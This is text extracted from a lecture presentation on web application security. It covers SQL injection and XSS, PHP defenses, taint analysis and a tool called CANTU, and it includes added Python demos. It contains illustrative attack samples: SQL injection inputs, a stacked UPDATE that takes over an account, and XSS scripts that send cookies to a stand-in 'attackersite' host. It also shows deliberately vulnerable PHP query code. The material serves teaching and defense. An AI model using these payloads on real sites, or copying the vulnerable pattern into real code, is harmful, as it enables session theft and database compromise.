Presentation 14 PDF
Figure: interaction between the user, the browser, and the Web server.
1. The user interacts with the browser.
2. The browser sends a request for a Web page.
3. The server retrieves/generates the page, possibly using data from the database and adding client-side scripts to enrich functionalities.
4. Delivery of the page in HTML + scripts.
5. The browser displays the page and executes the client-side scripts on the page.
Note: cookies or the equivalent are typically used for maintaining sessions.
2012/11/28 @ JST Analysis of Web Application Secuirty 5
Web Applications
Web applications refer mainly to the
application programs running on the server.
Part of a Web application may run on the client.
Together, they make the Web interactive,
convenient, and versatile.
Online activities enabled by Web applications:
Hotel/transportation reservation,
Banking, social networks, etc.
As such, Web applications often involve users'
private and confidential data.
Web Applications: Dynamic Contents
<?php
$link = mysql_connect('localhost', 'username', 'password'); // connect to the database
$db = mysql_select_db('dbname', $link);
$user = $_POST['account'];
// fetch and display account information
// (the request parameter is concatenated straight into the query text;
// this is the pattern discussed on the SQL injection slides)
$query = "SELECT id, name, description FROM project WHERE user_account='" . $user . "'";
$query_result = mysql_query($query);
while ($result = mysql_fetch_row($query_result)) {
    echo '<table>';
    echo '<tr>';
    echo '<td width="100px">' . $result[0] . '</td>';
    echo '<td width="100px">' . $result[1] . '</td>';
    echo '<td width="100px">' . $result[2] . '</td>';
    echo '</tr>';
    echo '</table>';
}
?>
Web Applications: Client-Side Script
<html>
<head>
<title>Example 2</title>
<script type="text/javascript">
function submit_form() {
    if (document.getElementById('user_account').value != "") {
        document.getElementById('project_form').submit();
    }
}
</script>
</head>
<body>
<form id="project_form" action="my_project.php" method="POST">
<input type="text" name="user_account" id="user_account" />
<input type="button" value="OK" onclick="submit_form();" />
<input type="reset" value="Reset" />
</form>
</body>
</html>
Vulnerable Web Applications
Many Web applications have security
vulnerabilities that may be exploited by the
attacker.
Most security vulnerabilities are a result of bad
programming practices or programming
errors.
The possible damages:
Your personal data get stolen.
Your website gets infected or sabotaged.
These may bear financial or legal consequences.
A Common Vulnerability: SQL Injection
User’s inputs are used as parts of an SQL query,
without being checked/validated.
Attackers may exploit the vulnerability to read,
update, create, or delete arbitrary data in the database.
Example (display all users’ information):
Relevant code in a vulnerable application:
$sql = "SELECT * FROM users WHERE id = '" . $_GET['id'] . "'";
The attacker types in 0’ OR ‘1’ = ‘1 as the input for id.
The actual query executed:
SELECT * FROM users WHERE id = ‘0’ OR ‘1’ = ‘1’;
So, the attacker gets to see every row from the users table.
SQL Injection (cont.)
Figure: attacker, normal user, and vulnerable website.
Normal user:
1. Send an HTTP request with id = 1128
2. The server returns the user data with id=1128 (SQL query: SELECT * FROM user WHERE id='1128';)
Attacker:
1. Send an HTTP request with id = 0' OR '1'='1
2. The server returns all tuples in the user table (SELECT * FROM user WHERE id='0' OR '1'='1';)
The diagram distinguishes messages the user is aware of from messages the user is unaware of.
Compromised Websites
Compromised legitimate websites can
introduce malware and scams.
Compromised sites of 2010 include
the European site of popular tech blog TechCrunch,
news outlets like the Jerusalem Post, and
local government websites like that of the U.K.’s
Somerset County Council.
30,000 new malicious URLs every day.
Source: Sophos security threat report 2011
Compromised Websites (cont.)
More than 70% of those URLs are legitimate
websites that have been hacked or
compromised.
Criminals gain access to the data on a
legitimate site and subvert it to their own ends.
They achieve this by
exploiting vulnerabilities in the software that
power the sites or
by stealing access credentials from malware‐
infected machines.
Source: Sophos security threat report 2011
Prevention
Properly configure the server
Use secure application interfaces
Validate (sanitize) all inputs from the user and
even the database
Apply detection/verification tools and repair
errors before deployment
Commercial tools
Free tools from research laboratories
Injection
Cross‐Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object Reference
Cross‐Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
relevant code:
$sql = "SELECT login_id, passwd, full_name, email FROM users WHERE email = '" . $_GET['email'] . "'";
The attacker may set things up to steal the account of Bob ([email protected]) by fooling the server to execute:
SELECT login_id, passwd, full_name, email FROM users WHERE email = 'x';
UPDATE users SET email = '[email protected]' WHERE email = '[email protected]';
Defenses against SQL Injection in PHP
Sources (where tainted data come from)
$_GET, $_POST, $_SERVER, $_COOKIE, $_FILES,
$_REQUEST, $_SESSION
Sinks (where tainted data should not be used)
mysql_query(), mysql_create_db(),
mysql_db_query (), mysql_drop_db(),
mysql_unbuffered_query()
Defenses
Parameter: magic_quotes_gpc
Built‐in function: addslashes
Prepared statements (for database accesses)
Defenses against SQL Injection (cont.)
Set the magic_quotes_gpc parameter on in the PHP
configuration file.
When the parameter is on, ' (single‐quote), " (double
quote), \ (backslash) and NULL characters are escaped
with a backslash automatically.
Built‐in function: addslashes( string $str )
The same effect as setting magic_quotes_gpc on
<?php
$str = "Is your name O'Brien?";
echo addslashes($str);
// Output: Is your name O\'Brien?
?>
To execute the above query, one needs to supply the
actual value for ? (which is called a placeholder).
The first argument of bind_param() is the input’s type:
i for int, s for string, d for double
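The query from the SQL injection slides beside the prepared-statement defense, as an added Python example that is not part of the original presentation. It uses an in-memory sqlite3 database with constructed rows; sqlite3's ? placeholders stand in for mysqli's prepare()/bind_param().

```python
import sqlite3

# Constructed sample rows standing in for the slides' "users" table.
SAMPLE_USERS = [("1128", "alice"), ("2048", "bob"), ("4096", "carol")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, user_id):
    # Mirrors the slides' PHP: the request parameter is concatenated into the
    # SQL text, so a quote in the input ends the literal and becomes SQL syntax.
    sql = "SELECT id, name FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()

def lookup_prepared(conn, user_id):
    # Placeholder plus bound parameter (sqlite3's equivalent of mysqli
    # prepare()/bind_param()): the driver never parses the input as SQL.
    sql = "SELECT id, name FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def demo():
    conn = make_db()
    attack = "0' OR '1'='1"          # the input from the SQL injection slide
    return {"normal": lookup_vulnerable(conn, "1128"),
            "injected": lookup_vulnerable(conn, attack),
            "prepared": lookup_prepared(conn, attack)}

if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

Escaping with addslashes or magic_quotes_gpc only protects values placed inside quoted string literals (and magic_quotes_gpc was removed in PHP 5.4), whereas a bound parameter is never parsed as SQL regardless of where it appears in the query.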
Cross-Site Scripting (XSS)
The server sends unchecked/unvalidated data to
the user's browser.
Attackers may exploit the vulnerability to execute
client‐side scripts to:
Hijack user sessions
Deface websites
Conduct phishing attacks
Types of cross-site scripting:
Stored XSS
Reflected XSS
Stored XSS (figure): attacker, victim, and vulnerable website.
1. The attacker posts a malicious message onto the bulletin board:
<script>document.location="http://attackersite/collect.cgi?cookie=" + document.cookie;</script>
2. The victim sends a logon request.
3. The site replies with Set-Cookie: …
4. The victim reads the bulletin board.
5. The site shows the malicious script.
6. The victim's browser runs the script and transmits the cookie to the attacker.
The diagram distinguishes messages the victim is aware of from messages the victim is unaware of.
Reflected XSS
Figure: attacker, victim, and vulnerable website.
1. Logon request.
2. Set-Cookie: ID=A12345
3. The victim requests a page by unwittingly clicking a link to the attacker's site.
4./5. The attacker's page contains a link into the vulnerable site:
<HTML>
<a href='http://vulnerablesite/welcome.cgi?name=<script>window.open(%27http://attackersite/collect.cgi?cookie=%27%2Bdocument.cookie);</script>'>vulnerablesite</a>
6./7. The vulnerable site reflects the name parameter into its response:
<HTML>
<Title>Welcome!</Title>Hi <script>window.open('http://attackersite/collect.cgi?cookie='+document.cookie);</script>
The victim's browser then requests http://attackersite/collect.cgi?cookie=ID=A12345 (cookie stolen by the attacker).
The diagram distinguishes messages the victim is aware of from messages the victim is unaware of.
Defenses against Cross-Site Scripting in PHP
Sources (assumption: the database is not tainted)
$_GET, $_POST, $_SERVER, $_COOKIE, $_FILES,
$_REQUEST, $_SESSION
More Sources (assumption: the database is tainted)
mysql_fetch_array(), mysql_fetch_field(),
mysql_fetch_object(), mysql_fetch_row(), …
Sinks
echo, printf, …
Defenses
htmlspecialchars()
htmlentities()
Defenses against Cross-Site Scripting (cont.)
Built‐in function: htmlspecialchars( string $str [, int
$quote_style = ENT_COMPAT])
Convert special characters to HTML entities
'&' (ampersand) becomes '&amp;'
'"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set.
''' (single quote) becomes '&#039;' only when ENT_QUOTES is set.
'<' (less than) becomes '&lt;'
'>' (greater than) becomes '&gt;'
<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new; // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
?>
Defenses against Cross-Site Scripting (cont.)
Built‐in function: htmlentities( string $string [, int
$quote_style = ENT_COMPAT] )
Has the same effect as the built-in function
htmlspecialchars()
<?php
$orig = "I'll \"walk\" the <b>dog</b> now";
$a = htmlentities($orig);
$b = html_entity_decode($a);
echo $a; // I'll &quot;walk&quot; the &lt;b&gt;dog&lt;/b&gt; now
echo $b; // I'll "walk" the <b>dog</b> now
?>
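An added Python example (not code from the slides) that reimplements the htmlspecialchars()/htmlentities() mapping from the two slides above, including the ENT_COMPAT/ENT_QUOTES/ENT_NOQUOTES switch and the ampersand-first ordering it requires, and applies it at the echo sink to the bulletin-board message from the stored XSS slide; STORED_XSS_MESSAGE, render_post and contains_script_tag are constructed for the demo.

```python
import html

# Flag values mirror PHP's constants (ENT_COMPAT = 2, ENT_QUOTES = 3, ENT_NOQUOTES = 0).
ENT_COMPAT, ENT_QUOTES, ENT_NOQUOTES = 2, 3, 0

def htmlspecialchars(s, quote_style=ENT_COMPAT):
    # '&' must be converted first: otherwise the '&' introduced by the later
    # replacements would be escaped a second time ("&amp;lt;" instead of "&lt;").
    out = s.replace("&", "&amp;")
    if quote_style != ENT_NOQUOTES:
        out = out.replace('"', "&quot;")
    if quote_style == ENT_QUOTES:
        out = out.replace("'", "&#039;")
    return out.replace("<", "&lt;").replace(">", "&gt;")

def html_entity_decode(s):
    # html.unescape reverses the entities above (PHP's html_entity_decode).
    return html.unescape(s)

# The bulletin-board message from the stored XSS slide (constructed copy).
STORED_XSS_MESSAGE = ('<script>document.location="http://attackersite/collect.cgi?cookie="'
                      ' + document.cookie;</script>')

def render_post(message, escape=True):
    # The echo sink from the slides: the message is written into the page.
    body = htmlspecialchars(message, ENT_QUOTES) if escape else message
    return '<div class="post">' + body + '</div>'

def contains_script_tag(page):
    # Crude check used only to show whether the browser would see a script element.
    return "<script" in page.lower()
```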
Figure (control-flow graph, continued): branch on $dept == 0.
True: 10: echo "Hello! ".$id; 11: displayManagementFun();
False: 14: echo "Hello! ".$dept.$id; 15: displayBasicFun();
Exit
Dependency Graph (1/3)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"];
05: echo "Hello! guest";
06: displayWelcomePage();
Graph nodes: $_POST["dept"], 3 and $_POST["id"], 2 (Tainted); echo, 5 (Untainted: its argument is a constant). Exit.
Dependency Graph (2/3)
Branch: $id == "admin" is True
10: echo "Hello! ".$id;
11: displayManagementFun();
Graph nodes: $_POST["id"], 2 (Tainted) -> str_concat, 10 (Tainted) -> echo, 10 (Tainted). Exit.
Note: a better analysis would take into account $id == "admin".
Dependency Graph (3/3)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"];
14: echo "Hello! ".$dept.$id;
15: displayBasicFun();
Graph nodes: $_POST["dept"], 3 (Tainted) and $_POST["id"], 2 (Tainted) -> str_concat, 14 (Tainted) -> echo, 14 (Tainted). Exit.
Alias
PHP code:
01 <?php
02 $a = "message";
03 $b = &$a;
04 $a = $_GET["msg"];
05 echo $b;
06 ?>
Dependency graph: $_GET["msg"], 4 (Tainted) -> $a, 4 (Tainted); $a, 4 is an alias of $b, 3 (Tainted); $b, 3 -> echo, 5 (Tainted).
Alias information: must-alias{(a,b)}
All inputs from a source are considered tainted.
Data that depend on tainted data are also
considered tainted.
Some functions may be designated as
sanitization functions (for particular security
vulnerabilities).
Values returned from a sanitization function
are considered clean or untainted.
Report vulnerabilities when tainted values are
used in a sink.
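A toy version of the taint propagation rules above, with must-alias handling for the reference operator and with designated sanitization functions, as an added Python example that is not CANTU's code. The mini-IR and the SOURCES and SANITIZERS sets are constructed for the demo; the three programs are the slides' alias example, a sanitized variant of it, and the dependency-graph (3/3) example.

```python
# Toy taint analysis over a constructed mini-IR (not CANTU's C AST/CIL pipeline).
SOURCES = {'$_GET', '$_POST', '$_COOKIE'}           # where tainted data come from
SANITIZERS = {'htmlspecialchars', 'htmlentities'}   # their return values count as clean

def taint_of(expr, tainted):
    # expr: ('const', text) | ('source', name) | ('var', v) | ('concat', [expr..]) | ('call', fn, expr)
    kind = expr[0]
    if kind == 'source':
        return expr[1].split('[')[0] in SOURCES
    if kind == 'var':
        return expr[1] in tainted
    if kind == 'concat':
        return any(taint_of(e, tainted) for e in expr[1])
    if kind == 'call':
        return expr[1] not in SANITIZERS and taint_of(expr[2], tainted)
    return False                                     # 'const'

def analyze(program):
    # Statements: ('assign', line, var, expr) | ('ref', line, var, target)  [$var = &$target]
    #             | ('sink', line, fn, expr).  Returns (line, fn) where a tainted value hits a sink.
    tainted, alias, findings = set(), {}, []
    cls_of = lambda v: alias.setdefault(v, {v})      # must-alias class, initially {v}
    for stmt in program:
        kind, line = stmt[0], stmt[1]
        if kind == 'ref':
            # merge the two must-alias classes; the new reference takes the target's state
            cls = cls_of(stmt[2]) | cls_of(stmt[3])
            for v in cls:
                alias[v] = cls
            tainted = tainted | cls if stmt[3] in tainted else tainted - cls
        elif kind == 'assign':
            # writing a variable updates every member of its must-alias class
            cls = cls_of(stmt[2])
            tainted = tainted | cls if taint_of(stmt[3], tainted) else tainted - cls
        elif kind == 'sink' and taint_of(stmt[3], tainted):
            findings.append((line, stmt[2]))
    return findings

# The slides' alias example: $a = "message"; $b = &$a; $a = $_GET["msg"]; echo $b;
ALIAS_EXAMPLE = [('assign', 2, '$a', ('const', 'message')), ('ref', 3, '$b', '$a'),
                 ('assign', 4, '$a', ('source', '$_GET["msg"]')), ('sink', 5, 'echo', ('var', '$b'))]
# Same program, but the source passes through a designated sanitization function
SANITIZED_EXAMPLE = ALIAS_EXAMPLE[:2] + [
    ('assign', 4, '$a', ('call', 'htmlspecialchars', ('source', '$_GET["msg"]')))] + ALIAS_EXAMPLE[3:]
# Dependency graph (3/3): echo "Hello! ".$dept.$id with both variables read from $_POST
CONCAT_EXAMPLE = [('assign', 2, '$id', ('source', '$_POST["id"]')),
                  ('assign', 3, '$dept', ('source', '$_POST["dept"]')),
                  ('sink', 14, 'echo', ('concat', [('const', 'Hello! '), ('var', '$dept'), ('var', '$id')]))]
```

Dropping the 'ref' statement from ALIAS_EXAMPLE makes the analysis miss the echo at line 5, which is exactly the false negative an analysis without alias information produces.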
Problems and Objectives
Four problems (among others) remain:
Existing code analysis tools report too many false
positives.
They rely on the programmer to ensure correctness
of sanitization functions.
Many tools report false negatives in some cases.
Web application languages/frameworks are
numerous and hard to keep up with.
We aim to solve the first three problems and
alleviate the fourth.
Use of a Code Analysis Tool
Figure: the website's source code and Web pages are fed to the code analysis tool; the analysis results go to manual review.
Note: fewer false positives means less workload for the human reviewer.
Note: there may be possible feedback loops between two tasks.
Challenges
Dynamic features of scripting languages
popular for Web application development:
Dynamic typing
Dynamic code generation and inclusion
Other difficult language features:
Aliases and hash tables
Strings and numerical quantities
Interactions between client‐side code, server‐
side code, databases, and system configurations
Variation in browser and server behaviors
Challenges: Alias Analysis
In PHP, aliases may be introduced by using the
reference operator “&”.
PHP Code (left):
<?php
$a="test"; // $a: untainted
$b=&$a; // $a, $b: untainted
$a=$_GET["msg"]; // $a, $b: tainted.
echo $b; // XSS vulnerability
?>
PHP Code (right):
<?php
$a="test"; // $a: untainted
$b=&$a; // $a, $b: untainted
grade();
function grade()
{
$a=$_GET["msg"]; // $a, $b: tainted.
}
echo $b; // XSS vulnerability
?>
To exploit the XSS vulnerability at line 8, we
have to generate input strings satisfying the
conditions at lines 1, 2, and 7, which involve
both string and numeric constraints.
Challenges: A Theoretical Limitation
Consider the class of programs with:
Assignment
Sequencing, conditional branch, goto
At least three string variables
String concatenation (or even just appending a
symbol to a string)
Equality testing between two string variables
The Reachability Problem for this class of
programs is undecidable.
Figure: architecture of the analysis. Parse PHP to C AST; Parse Python to C AST; Parse … to C AST; the C Abstract Syntax Tree is converted to CIL (CIL Intermediate Representation), from which the Analysis Results and the Integrated Analysis Results are produced.
Figure: screenshot of a generated test step (<action>browse</action>, <target></target>, <typingString></typingString>, </step>) alongside the original code of getStep.php and verify.php, which use Ajax to manipulate the webpage and verify it.
Outline
Introduction
Common Vulnerabilities and Defenses
Objectives and Challenges
Opportunities
Our Approach: CANTU
Conclusion